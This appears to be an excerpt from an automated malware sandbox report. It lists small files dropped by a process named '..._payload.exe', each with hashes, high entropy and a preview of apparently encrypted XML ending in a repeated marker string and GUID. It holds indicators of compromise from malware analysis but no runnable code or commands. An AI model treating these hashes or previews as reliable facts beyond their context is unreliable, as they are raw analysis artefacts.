                                                                                                SSDEEP:12:j1yMtYdZReLTJn5aJjxb8JoeqjsyK/71nv0O95VnlxyFWjz8FOXPxSgJc3cii9a:jwxbITnExbmoeqs/71nsmnzkFIPxSx3X
                                                                                                MD5:98626D75F3ADBCF2A9BA0439E429801F
                                                                                                SHA1:CCC3360819F36B9A153EE57E7D2597609750DED5
                                                                                                SHA-256:FBB0F5D2411B58D3183590C58F03E6672B4048BB0C951395437E8224619EDC59
                                                                                                SHA-512:79C3A21D35F4AFD2AE15D76D848CBC1E2BBE49A107FA093149C9C48EBE366664F1FC11D03603473978B2C3818795E1A5787C0CB39E50B526A1FF71C4E09FA0DC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.}..(%=.....X..Wf,.62.:j.....D.S.8.E=;.K,......E...W\~....:. ..?WT9i.$.<.gJ.}t.a.,..$&.W..a/.................v..S.e.v.-....7._.]Z.s..r.-..ne.V........&...C...X./h./Y.....%W...}.s:..$..L.o.^.9...|...V...-..@.y;.`....HUf.\Rs8....9&..O.k-M......Qa 8..:........GD...C.....K.7.....0.p-G}gymy..<I.[xd.P...Q......"<.R..f{......+...E...VpW...7+ .........A.....^....R...G.h......a.;zny4...n^....,.]<OLp.......qg..7...0.DW.i=.C..].y.u......v..ZFm.6.t.|..8...~.h.H].L..|...f..(..^u^_$..s.^.s... .+....U.V.R..d?.1#~.....s..Y.Q."Jp.+.qQ...`;I.:.h.w.....j..W...Y.N..=...J..;.,.;@. ....CU=.).....n$...!."]....R"U...K...B.c.2...s.M.B....O.Zl..Q}...U.iz..L.6e/.'.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1037
                                                                                                Entropy (8bit):7.7750563704881905
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:whZkKu34ixe9tKREBkoe6EHwurDwNUSX4ub/+VWmnx3bD:jKus9gREaoe6mMUStb/+MmxLD
                                                                                                MD5:C0F1D95397907FF7B1584F7B6590FE05
                                                                                                SHA1:01E85A5233B17C04E718527CC8F59FBA3DAC741C
                                                                                                SHA-256:6246D430585E4E4041B5BFF70C607A0E7947AC2A700364F4E2B32AD34C7D4EA1
                                                                                                SHA-512:A152FA8F353E54F8CC7DD49F79AD75A9926C322EE7ABBC247A160912B6EE82E9B8AA21A4992F631C7FA77CF8A820D85B12C98EBDBB284B587C614F2836560C17
                                                                                                Malicious:false
                                                                                                Preview:<?xml..GQ.=.o.8..f..K.>s..Z...e..j.v..~..-....,.a..l3-~..04U.~....Ul..^..f......MMB.a.Dm._..aU.U...c....$]0.RITq......P.3d.u.&.LqVf.y.j.NU...9K..+_..pK..9...g.......eM.v........E......st...>([M.....+5.>....{4.P...cL.B..@..d.<...Ki2.*..e......E`.#.a..N...'N.4..OSj.@*.V.T....c.,..=...c.l.q[.N...E0;....l.Eh..b....BN.a..KD.......Cje...>...y...]....X...M.h..J..:..E(....&..7.L..N.........Ns.....L...7+._.1.\....&.".p.W......TCZ....w]....9&!.$....G............R...1%.e.nH...oV;..)(e..K..|..Uh...o+..G..$..s...V.O.......)%3.Y....w.....s.]..?..r.=....!$?,...`. 2_S...i.."......<..G%..;Ppd,;3z$<.5.a..xgZ....R.[4.)...O..G..l.:./.xS.'.8J./|.].._..;..L`Ku.\.a.....[.-..u..........k........i.dJ.R]t.U.&...R.D...\s.rj....-m0a^..D.....%I..v7..!N.7@gl.dW....8M.I......Wa`,a.j..c..........j.9....p...n.J)...=..a ..p.&....]R(...]..G%.NS&...$D[.$J._ .j..<.*trd.........3D&.#mBX.&.Z.3E5l...|..%......)8.....].NG.vi..G......g..:BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):920
                                                                                                Entropy (8bit):7.7884693681392925
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WpyBqR/WuufW66RawhJwDiFfcgBDEI5gqskBeax3bD:SWuufW6eawhmGVcgJECgqskceLD
                                                                                                MD5:95B1C74D20591F5A2B9CD8FF744B95D6
                                                                                                SHA1:E43B19B1AD95A4F2E0B63A6762D2F75183A2B32D
                                                                                                SHA-256:9432BBC5E45672AB403254512463198DDAC00909E76470FE3ED0A55A9CF26843
                                                                                                SHA-512:36905D2E2FFE758058BDD8E38DE66114A66EBACC803299D3E5D5A53330DB8BEF9DF57837C369042B12A32A32BF4F232521EF349B9C222F21FFADACCBB963FAA4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.<v.d.T/.l.......hC....g..E.s2..:......l....=^'.X.{../\.(Q..........^...m...b..t........Z.N...6......d./.F...(~..9....J4z9%pZN....o@Z...nfK.....9h...=..Yk~vp.$.rJ...K....x..9.-q.f....Mm0.x..../f.[p+A.....Bp...;..c.{....V?F..<. ....2.27.`.)..Ig...y.,.$+...zZ.;.......>...b?..!..|.x.b?.:T. .J..........=^................L{[..&..B...I..L}...F2.(6T.)p...+..[&....~.=m.."..j3F"N..L&...#...L_..] ...Ky.~..{....F.a..mx.].3.Y...[.c."......>M.'.9....5...A .N...KX;...n....F......R...J..|........I.%.........F.i....P.~}.-5.2%,...u4o.........l0...f.....z..R.s.....KI.....~]..4..O.Y..dG`.c..!.=.Tc.....I9......a........P....U:.6..D`.8.Te9L.Q.{^g...GB....u5.1mV.E...A.1..Yq...I."#X..k&..2N._g.w...........V.....M,.=#.........YM.......C.z!.g...g..u..j.H.X.lQ......6..F_....S.YH...q]Z.@7..{..2q...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1147
                                                                                                Entropy (8bit):7.79683001456921
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KwGTRjaAv0LbSE5Qqu4fntJn0CHZMHocy9xa2gx3bD:7GTl0LFNu4ftJ0CHZgI9YLD
                                                                                                MD5:5B3AE2FE0DE991FEEE85790A68F8DBA7
                                                                                                SHA1:F8D73984D7F6AC74C57E41E9CC4F4C1672BF04F7
                                                                                                SHA-256:9BF562097F59D44B965DFCC849C0D50D990D2C1CD61849EDE06A2B2348B8C224
                                                                                                SHA-512:12359098541904C5A7D6BA3ACCEE6881337D67D994DA47FFFFCE984FC47B9F139099882F09105308CA8CE12C28BA954500FBB48E6AE218871CB3CA0A0B49B2C7
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....);PNb}.2*...X....K....p.....Ik$.D.@.j..m...@..(.......1DL.|...k.>.......m.Q=....T.?....(.H....R..+../.s2.......=696;!.c.Yko.../?.i...."...Z7p..[.Ea5..!../.......)...p).\:]......\........<.UGL$..$Z..T.[A}.....s...YQ[."'....%E8...ZC.Q_.....GT`8....(x.!.Y/AJ...py.....e0vj.o...UC..";...r2z.+.......A...,..>..;BTJc.....[k.S.J..,..r~n...(J8.... 6...H.I.=.i....2.....3WZ`....|..S...,4Dw@..V_-5r.3X....w...TA.)D..5:sVBF+.KH.c.. ....I.T>.q.;_..}..........-K>.%..b[,......v..bBf.....bS......E.1.."K`.!..AQ.v.........k...p.B..c'!U..j.x..'8.......... ..!H.._C.^1}...3....c...1.74..ny.....k...kh..n.$.1.DdfI......y.."....|....St.r.........@GwR:A1..R...].?..H.....1..n....t+:......!...(.........4...DE.[....8m..n.6.X:.a..mc|[...]....w...NJKe..9...m...Y./.'...[.......r..U.T.Y.......u.......6.3........].:.)8..Qv$..3m.jI.Q...`../.nX.`.Me...3.?{Tu[..Hdv.m...c.F-ZmvB.68.7Y..f.......<Gf.RLD..6bv.+7]..&..oR.. .....4=.[....&....5.....U.....s.J.i..8.x.... .F.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1141
                                                                                                Entropy (8bit):7.79158570795952
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7EXvfAqJb8KL9y1/NHuc84XlsFxzoeU4pFR6tGIpk4JC1OYp7Nw+bU1+jx3bD:7+YqJbt9y/uyXlmtU4h6t9yhw+Yg9LD
                                                                                                MD5:12D711C02F5C5832A8305F196D16AF34
                                                                                                SHA1:911FE4770F662BCFC09FD84ADC74F6E2A7352FC6
                                                                                                SHA-256:26BBD832B0A39E29C21C87614A59E217A531CD35D840E41F19AF0845C2A44293
                                                                                                SHA-512:D5CFFE25452C4CEED969B50AB189002ACFA9FA8CC6F10E073676EE1E699280B330B3297A337A04A75B232D5724F5E83DAB5A7D62F8594A28FF7225F2F3922EA6
                                                                                                Malicious:false
                                                                                                Preview:<?xml)yd..&..=....W-,rT.3v...J.m`..L.=.x..Q..e..*,.h6..u....O.A"?..)n..C......Ds<.)..P.....gDu.}8].a^.j.*.........O..nuD5..%..F.}.e.0....x.qhe[.M.D.22......C...F.E...}.......-Y.....g.wr....b.'V.D.FI5.....A. I2.8M...(2I.%,..W....S..[ao...q...S.B.....'.y:n.l..}......MW...+.%......H).1..]G.5/+4.....B9QJ..mR..@..c....S...e..B....@t.+.......Q....5w..d.}".p..;!..F.'.X....W..-g.V......z.....D.uD..n.....lF.....[..h.|E:i. s...:i|k........SLW......r.QX:.......4`....Pw~..?b[.F.\.B}...f.T}^*..Q=h.:.C....P..4...4..={Cs.u...8.{."C.:K.[.o(F....;..Y..Ty..._.e.T.Y9.y......l`..Kw.d.zNTG.o...E.d.gC...v...V...sC.4k...P"{.8..4. .4..Ih.>.;...=....x..q........n...dz...,.!|(....3.~..C.x0....2.y.........=G..uC....Ft.GDv.I.k...y..C..:....z...s'}...Q.....Q^.....M;...:.A.,.....r.63GH.86.......!..Y.K?...J..ys.X..[...F..Y.../.f(..N.......6..Z.K.86..Ck....G;..........=.6y..+ .x0W.V....Q...@..o.,.B.Tkh.=......;L...g..h.4....x.[@.....|.=..y....C..`.......@.......;...k.9
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1145
                                                                                                Entropy (8bit):7.831663206949725
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:PC7dylYv/485U+7hXCJAmDmvSzkmPX+BMr5gXE7r5nfyMx3bD:64Yo85jOXhzDXr5KSrdXLD
                                                                                                MD5:E4E5483322D8CEBF2166CE53D28DC719
                                                                                                SHA1:251DA016AA9835E3CDEA1C13CE2ABE086742EAF9
                                                                                                SHA-256:D20EDA27EBF072760BB3813D6FDE8313756964C0289FB67F28FCC51034109457
                                                                                                SHA-512:E348B3752DA0F475FAF10E780D2AF155B97700719A130D0C75C51D2DC0159B680382F5A1B6132279E29AE7B45F72D0153101911315F439F355BA560718F6288E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlh..:z...h.,Q....1..)..\.p.......l|....>......p.....X..~E.[.....j..M}.p%m4.......}.t.x..&...Qd.,.:...*...@W.......d.....Z.1W...g....ty1>..(....W.....L.u...V|.3...).X.?.'.=.0..h0.....a.{..../..E....M....}Q;[....%.9...]._.7...w.......\h.7|5..'.o.Gf.l...Y7o.07...`c.R..X..d....o...I[K.k]%L/.....#.^Mz.....h.......H....^.#.wFj.c..SbQ'E}...J.8....e..7&..".Q...4.....Tmy..[h`R|....{.Y..H.9*.......Nr...EB.....9......).....\.C.d....:<..T+h.[..f/0...<D.!..W..y...3...X.Bb!00^......;n.R.[.A.._..w.+...7.).y..kv.,...M...7.=4...$!...\.D......n..)e..0.vk8.^./%Q..^.s.{.\.<.w...R./.Ht..%_>..j....x,.Z..l.%k../..?..~...O}C.Q.....j..e..'.;T.G$P.j..a9{/h...C.[N.%..a:V.....L.-LT...%UA.M7l...0#M.A..$V.C{6.O...!....z..5.....u{.$...D....."...U9.....+2.....=.F..r....o..oAJB.7..St..]..C.|u<#.X....QU...C.e..g...w.O...(.#.\A6.%#........'..}...t...M....^...@.......}r......y.k......S.4;.z??...^..P.0....j....\.\....}...m{........u.A...N.#..*..."......z..Y}q...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1145
                                                                                                Entropy (8bit):7.804835556596317
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OkRXkE9uHWr31t2sihO7KXXUnxX8BGG+bFvL1N7FY/kxF9os5eJzdQ/1x3bD:1kaD2PhmRgGTFvTTxFKFW/fLD
                                                                                                MD5:6B69D7C88B2B62ABBB23D7EC2DF9FDF7
                                                                                                SHA1:D1B2C4DF4AB7FEC69DEBF89C643354D420378CAA
                                                                                                SHA-256:AC357133169178CB31F5E1CFFBF3D82BF3EC9F7189E17899C20006B5463C2766
                                                                                                SHA-512:8AA640A924F817CE7A8B4AEF2CA638653C7CBF91364AF1BE54C0830E42667342A8FACD2B4158C72D7F17EADD9B4FE3058EBAA1A96FA8B716715705CC71AA5BB1
                                                                                                Malicious:false
                                                                                                Preview:<?xmlSr.....N>a..N}vjk]U@.qx..U..^.D..<..x......mO{.....u...U...Tw.].K.o.mX..s..v.."R..L....N.`.%.B.s.h..*...?D...V...f^.Z{0q.._U..#S..,.D....."...c.y4.j.g.....K.....3...2..*..9...X.e..&o...<...D..$>...c.F...JN....IQ....E....Y..1..y.....k.~=1.dF..4#....z.X.-..+.F.........w.....zR.f!1...n..m..`j........I..0. .(.J..iM...^8.-.A.z..VB....&...,Y.Mw..:Q.=.2........Y>(R.h.....;.E..1.7....3...m.o.t{..(.r.$...?.i......Juc....<.D...+....=V..-.0.m..4.O.E.9......^)q.s....7O..........q.G].U..w...1.Y..E...`.@mHk[M.....9/....24...iPI....S.S5+.ta..U;.B...C...L.[.=g...Z.....R.I].#D.....r...E..[5....9|>.V..].S.:..Z.h1.w......r...b.Y~\....0...j...pQ3.KX....9+?.........%....1].x.Y......V..d:+6...d....D..f..S.`....3...D2.f...;[.5..m....._..oK...M..{...L.........j]....q...;.0...S!..Lz&7.94sF.8......+I.E.YzI."y.).....Z......\W....$.G.....^.4.8rE...qCmq[.....[.;I..{.1...bR...3.&U..o.8.}..+.@P..mI!...........d....fo...c/n2...........9....|..+....u.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1145
                                                                                                Entropy (8bit):7.812038845673739
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oe7nnNUXHfgI3EF48F/70t6RRG4jPm6GVWh78vDcvRO5ohOdCkmA2L06IUOVAx3X:V7NUXdEF48PRA4jPEVlbZKhOdCxffLD
                                                                                                MD5:863D30FE31943E2ECA608B8388982179
                                                                                                SHA1:69CDCB1BFB863EDF5F20CF9963D2F53F0D82D67D
                                                                                                SHA-256:5774EEF91D78C3CCF3E5187102A881F68ABF4406DB00612E11B9B1809E97E207
                                                                                                SHA-512:C7B93B1133F479EC507723D1B2E3A2DA4D22BDCE9FEF09EA6D65EBD4EBB1D0DD060EAF7EE5F706F95E117FD4578AAF28EB4B4B84E75EA3F996C9E463F411A7FD
                                                                                                Malicious:false
                                                                                                Preview:<?xml...{....jrk.z...V4..K[..3....Qb@Ka..V`.=MB.."....j..f.U.Q...q..i....n#F..:..b.E..../.X...1.>..8[. P:<..F.4.Lf.&.....[....p...,*....1\%gN.."...[....8.x...3TPK...T...#......_.=..=;.....]...*.#...K*Y<.$.M.`+.O.Pj...w.t;....r.D..g.z.[.._n.W....^\..Zn1.Da\..-...5"....^.!..,.,..a..dZ..K.C...[.nir.T[?...z..`B'......W...6.E......X...m...-.mII.)..Qt.......JB..e. 3B3..,.M..z.$...A...3r..<>&.&.E.7.ps....G{6....OJ@.K.....K4.m=_.u_."#.....li...r........c..l.....$..:..$k....Pw.W0..t. .|x.F.BD....(q.`@9.J....,....c.../.....b....x..v.U.V.jT....#6....S.'...b[.Uq9t..4....^.rn..........79...Y'.3.......:.b...~\..M....lqY.....V6.=XJr..E..@p..Iyn.e.....xBk.....P..A.I.9..Kb.D..C."....@...:'GG.xe..j..)...uaeM..I9{$.7#A....o.S..)[...(.3.p0H<k.cwKQ...UP......,.......U!.7...+..y..k|...\{...k,.......;.;t.`.hw.~..y.R.}...%.Vm9T1u.'h.........m.5........Q.[...34..i.I.c=....!..3.9.D..../r.;=.......i....e.&..F.XC+&F_-O...$+.n......^.?.lu.y.7.T....V.t\..C........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1144
                                                                                                Entropy (8bit):7.843746115475678
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oEGPtA1uD6q1oLMuQng2+WlfodFR3QKjOfgLV7XjY6cq8vhmbYzwdi9381x3bD:oE2t3DYLWlR2PQiOfo7AqOV8fLD
                                                                                                MD5:174F2B1B1C9E5BEFF441B225F84219C5
                                                                                                SHA1:CE55013E994154CA5D95F55B0E7EF051173A1069
                                                                                                SHA-256:5598B6052B5D57A67E047A2EE7B4345B0255AA5FFC5AFF36B2CE7C72A2B0EA73
                                                                                                SHA-512:FD71AB621CCED0923E6F9D10875FDF1FCC0B26EE25D30D8217ABA6C46132FD7B7741A9F92B804AED36CCBB3725709BC700F8198D2FF42D2770760D982CCC508C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..v..gV..l..ns....=...|Fj4.....R.[.....uR.3.g;|]e\\...d....\.....IwM...^...-..+.Z..w..7....T..W..%...-..+..wH.L.81..bZ.{9F...?.....%....R....A.%D.{...`1....g..JH{F.l...........*h,-/..7..i..)(<_).....W8P.3!.....<.....u..rO.Ik~..=.o..3@X.Z...5iK!.{.FAe....F.....=...zJ..eE..6.?..>X....>..i.C..>.p...\...>.>T..........{-..CnX.+p.'.=.>N.s. .lvk.*lw..._......(..#u...B..q..'..WX...C.y g..:<....)RP..6....b...h..5?.%zc...).h$m..........@...5(r$...o...c|.....~...7.I....V...V.3..2.A.....)ScV{.9..v...c..8e7.+..VATT\...*..OG...-..vhH.T....-3.+,.r.c.aOV.%....$."..-..t?0"...GSy..Ue..%..E......8U.l`.%.......pO* G.q.7=....0.5m.."...+:.........{...N.ep...;..l...K.../....:%^............*."?v...>....t....r.!.Y}.Q.....Q.....Go#....~(...-bz...U.9`...`..|.].....m8&...X.`..g.:.f#...._..}'_.c...K...3..z.le.&...U?......g..C)@...-..Y'm...XO..-.q..U.6..X.i.....gTU".%fW..._y.....f.Y....>+..(.~=.4m.B.A.......[.(.. .`^.'....f...R.dE...I..7...t.+.S.}Xt;+....s..m.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):848
                                                                                                Entropy (8bit):7.738228497514873
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kKLkVsvHjWwXqhlEcFk4ceaGqsyIp5hGdSx3bD:LwWXqRnaG6iXGdmLD
                                                                                                MD5:E3BA4FD2FC70C44653D69FDED9110991
                                                                                                SHA1:CDF76EC649F4166EAF7E559D10890490010D4666
                                                                                                SHA-256:2BF8601ED62A2D609EDDB585CD0E8DA64C0B7BC097000CE317E4FDA406D634B0
                                                                                                SHA-512:07A7C6A0E5534B966A66FB03340A8A9A4BA81528D4C78DDF61D63AE0545E7A601237ED2FFCBF25ED642483BED40C4818080EA1855E4712D49BE2638694F43038
                                                                                                Malicious:false
                                                                                                Preview:<?xml.w..]..;`..:..ne..2..7+ifG..wg.....s..........1..<.y.x.Y.t....Z.a_.......b......2(.B1.Q...c.............,.7M.Wb.2.......}qa.9..B.e`.cm.H$......:.G..M....81..!.............8...>c>.~..I..W..Pxm...[#h.3....k.."uo.=.....b.u.fZl.D...-. .....\j.%{.RQ.KWTl.xN....O..E.(......{..s......IV...ES.3=.@.\...v...~...R...n....}..V.Oif..,.S.ml.z.'.P5<BS..8EJ+z....4......w0..-..2."S..P.4\}...."....gdy..-..x[...U,.H{0..5f...{...e.<.-]...r..B.....H.x{f...K.%.n.k(....d*.;...i.@ZLRt....=............_....6.-g..1...N) ....b..+...5y.r....uN.um.`.f.G..!UG$.....e........Fg.bC.9......T.l...i.c.3.a>...x.2..9.b..l....G.+.v.d.AKM[.96#......&.^.....eo2&.I..].K....B.U...Wd..E.(.R....N..e.$L<p.$)......_U-.>....Dh......f.n/7.`.\..|..D92...?-..)&..w/`....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):767
                                                                                                Entropy (8bit):7.714720172580587
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:oYLhqvrKIluRVi1o8iMLxRmPm5IO1KhRaUgUNapgGO/KVFdtjJoKtnlybhFGdrJb:oLzKygMo8NI0ksUgQaZ8EftjWKtEbPyx
                                                                                                MD5:E955C87CCA22F3ED99662366ACF8FBE8
                                                                                                SHA1:DA370A2332D16BDF7641ED9BD7664905E789C15A
                                                                                                SHA-256:4A05EC19561439A9DCC0FC91B4FBAEBB2A5A42B959160EFC564956BC27653E9C
                                                                                                SHA-512:ED5AC83C939A4FA735F687A3CA6AC1B07ACA95D73C147C3684C3903BCC5193475B3FB0586483FFCDB545F9858872ADFEE73786BB70FBD74849950E3A1F3C8779
                                                                                                Malicious:false
                                                                                                Preview:<?xmlUQ.....U.........../.....!...%...|o5#..P..X.'...T.R....iV]O1..../......v.>.&...._....-.~1....kH7.mn4.`E..?..*........|.I\...n..`....V..Q..c..Y,...nY..}[......En.B....{..a?......e..-...0......'....../@.fH...%..p.%..}=...(1..Y.oiY[.1...\..]}g.6../..Nl....le2...O....Md..g...B...l.R%..4....qH...X|E.H.(..........S..l........*+..et.....4.4...n.........E.(..h`R,#..6^O..~]...pL... ./...q......<7.....f"......cFx.Q....I.v.....q.w>.6.47.R.....I.._5...L...O9rT....<.......$.F....h..7w..l.#V.]...`.1.....K+../|S.`..[....P.....3..i|..=...A.[..qoZN.E07...;(h~..:}.p..S....."[.K..._.f.g4....j.|.b...=I..4..=.7.Nb.0.@..84?...1....P~Kp...?Y......L..c.np!.T.5.GBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):845
                                                                                                Entropy (8bit):7.749196919004264
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:sXDQLrWDspvmwYHdp8rroCugeH0a5bjfWZNHQCP0uNQ6Sx3bD:sXD2rW4Z09p8o/fwPmLD
                                                                                                MD5:9DA1E65B3C8E28A79177DC2186169E9C
                                                                                                SHA1:774480B79A006993A50B95CF5C90AD9BD902B2A4
                                                                                                SHA-256:E31FD2BE8071F603F90DE186B99002AF38DD58BCA37390D1EBBDBE04357AB5E9
                                                                                                SHA-512:B6BC5DB250A4AAC3801C40722FB3B1BD9D562F5EC48F65259D45468E052426FECE597E17D99D0132FC4A86E0B8352F5F0BA193ED98610BD7598DE584F0133304
                                                                                                Malicious:false
                                                                                                Preview:<?xmlN.......f.xl......kE[@Y7..f....F.W.....,S:C+....w....zi.k.ukT\M.hP.8.Y...#[.E......;;...D.i"?..U..T....D.pa..m5..`..Bp..T-=..........N3I.m..;si.wKc85."}..R...J..9..O._...B.N..\.P.....HD.-.Kh..L...s^p..........t*..H..x..}...... |~.R`....}r*f].S^Z...o..a......>a.q......9..bk6..R..d.,...%_y....^.0...Da.]........w..}p\....K.`....GT...$.G.].}.}~.MI'..9.O....O{.p.O.5...Rm.....\.P....p^..JT.$Z&`.Y.G..Ol..?....S&.c...M]..........dD...A{~RI....]1>....uz/K.._...>oD.6.s._..u.E...#..(..{.%=..~(.(.(`$..\.2.>v..sC.a1.^f...f........8../kD...OO^..1.,@F.$..@..:>.H.A(..W.Z...e....'..>.....R...g...Ny.....;*..W#,......M..(.......q8.v.+bx.IY_$.c...]........:...../4.>.+.]7.....d..l.;,y.....l.vJ{u?....Y.@..P)>..N,.6m..].y1.D..X...g...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1233
                                                                                                Entropy (8bit):7.834102431365996
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uDxCeRZ4D6Tk8I7hQIafMIya0Hg19ssZkcar3LFVa21XC8Ax3bD:uIhKk8I7hQnUIH9sEfYjJXC8sLD
                                                                                                MD5:6B3A9FCAD2E625267C91929ACAB7F49E
                                                                                                SHA1:57F0749D57D817DA7CD66D75D134B5488634318E
                                                                                                SHA-256:D83613C8D76091EF20DCE0BAA111ADBE066FB998E320E7509552EB67C6EA62A1
                                                                                                SHA-512:83542FE8EA295D985865B17466301B8B06B4E8CF2AEB7C248F125383F7AB027AB5C6083CDB720150D066DA638315A611B47782E7A86F13E52FD9E29A5830B730
                                                                                                Malicious:false
                                                                                                Preview:<?xml..h.......C..*.v.........:vS...i..V..4...I..d<..\.....k../IgG..5....V..%;,$.).|) .z.......S...Bn..CD:dZy...;;.e.t.k.!..<(....2."..$..y..T.f....ij.,z...q...o.W8G.c...=...0."o.,.HB.1Y<.{. l#.d5p..t.-.m3.....cR3l>F..0M5...9t.`.....M.M..jH7..\S.k..!.W...03!5-.....o.QJf..\<.....C..L.....9....e.....?.-..>-.....'..s. ..........W....$.(.(..B..,..6..*.H...+3 ...aO!b.\Oa..,o.w.Q......;y..;N....6.....?....[Ey.l.7'<.d...f...[D.. .....fj;y.@M.b;.....&.E..t..`g.^..ii.%..';K... .'..t.J..qk..4MET.J...?~..FY..4.*.v!.b...].T!.tf.!.I.OA.?H....kd..J).....[....E.A@M0KP...\.L....M.;.*...`.8.w5..Og.=.+=.%.RC..!r ...|....`..@R.8..D..$P..........gN.V.....K.jU.GB.G....f.......'we...'7.....d!&`8p!.{zx.#..;..e..;.#.ggb.]..R..]...T.1.c...&.^...zT...#i$.z.Ga...S.........p+.;.Q..Ic..;....!.<.Bl.~....\.S......s...a.j\....-.#g.7...o..ZY.5.CU.........X_.zHb,0.j.K...'..........)...I..?..9..Zh......Rjq........0.M.....X...|.x}99...>../.T....k.,.,...k.nj...a...........Sy
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):934
                                                                                                Entropy (8bit):7.777871419647704
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:53k7uEnvkZHtSeNvZlhWqYXmr2gDgT7x3bD:5fmCSMlAqYWbgTlLD
                                                                                                MD5:EC7FA1368F2B7D7FDFDF83FF7CEFBE65
                                                                                                SHA1:D5B47DA471B67E774A27B0A0181954476AB106C0
                                                                                                SHA-256:BCAFB2BB27441ADF9417270F4BE3F29D8500955FCA863432A4BC980D429D3F61
                                                                                                SHA-512:2EF9BB8C475DB47FC68AD0392DB80662A87B326EF2B93C6C7B1357CF5A3AD272EF3925D2FB49B7BD62681930AC40263961E907C2FACF18CBBBE86992951B52DF
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....G>|.......9y....K..A..\...._.H..<..).4......E.1r...hW.m.-..G.l.........k.B..i..J.L).:f*<_...+DG.A..."..H......_[_.?.h)^..tb.C.1< .....?./..(m.......km[E.w?z.zBZ.d.X..}..=.>.#...ra.A..Js&}..._c.;...A..S7.Z..K.%;_....h.....R.......an8..W.!.M....jw...H..@...Ji.;.....i..hD1.)C....^......n......9j..|e.m.....&..`s.....T..........T.x.pC)..V. ..Q...B...M.o.. $....f......+. .......QR/.r+...g....$....u...2....3.5Q....N.+q...M*....{..Y....eT4+<;w.,.j.t2..&.%...g...p.>..D...=.".NMv..C.J.kj.xA.!.m.......tu.i.kl.....+.`J...Nw.,W.aD.!1.._)r!..`......,.........U......j......v.E...{n.....O....E..S..yCC!T.....m.../.....w.w.J.....g.....H.2.o[.c9...._..:[6...D..`?. .N8.........X...@..........$.3.;...N....T0...@$........#.IrR.`.h...}iD.V.......r.0F...cV;[:..8.1..)..BqgyZ.a....)heR.H.....A4.b.*.B.F.y.h.X.....Fo....J..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
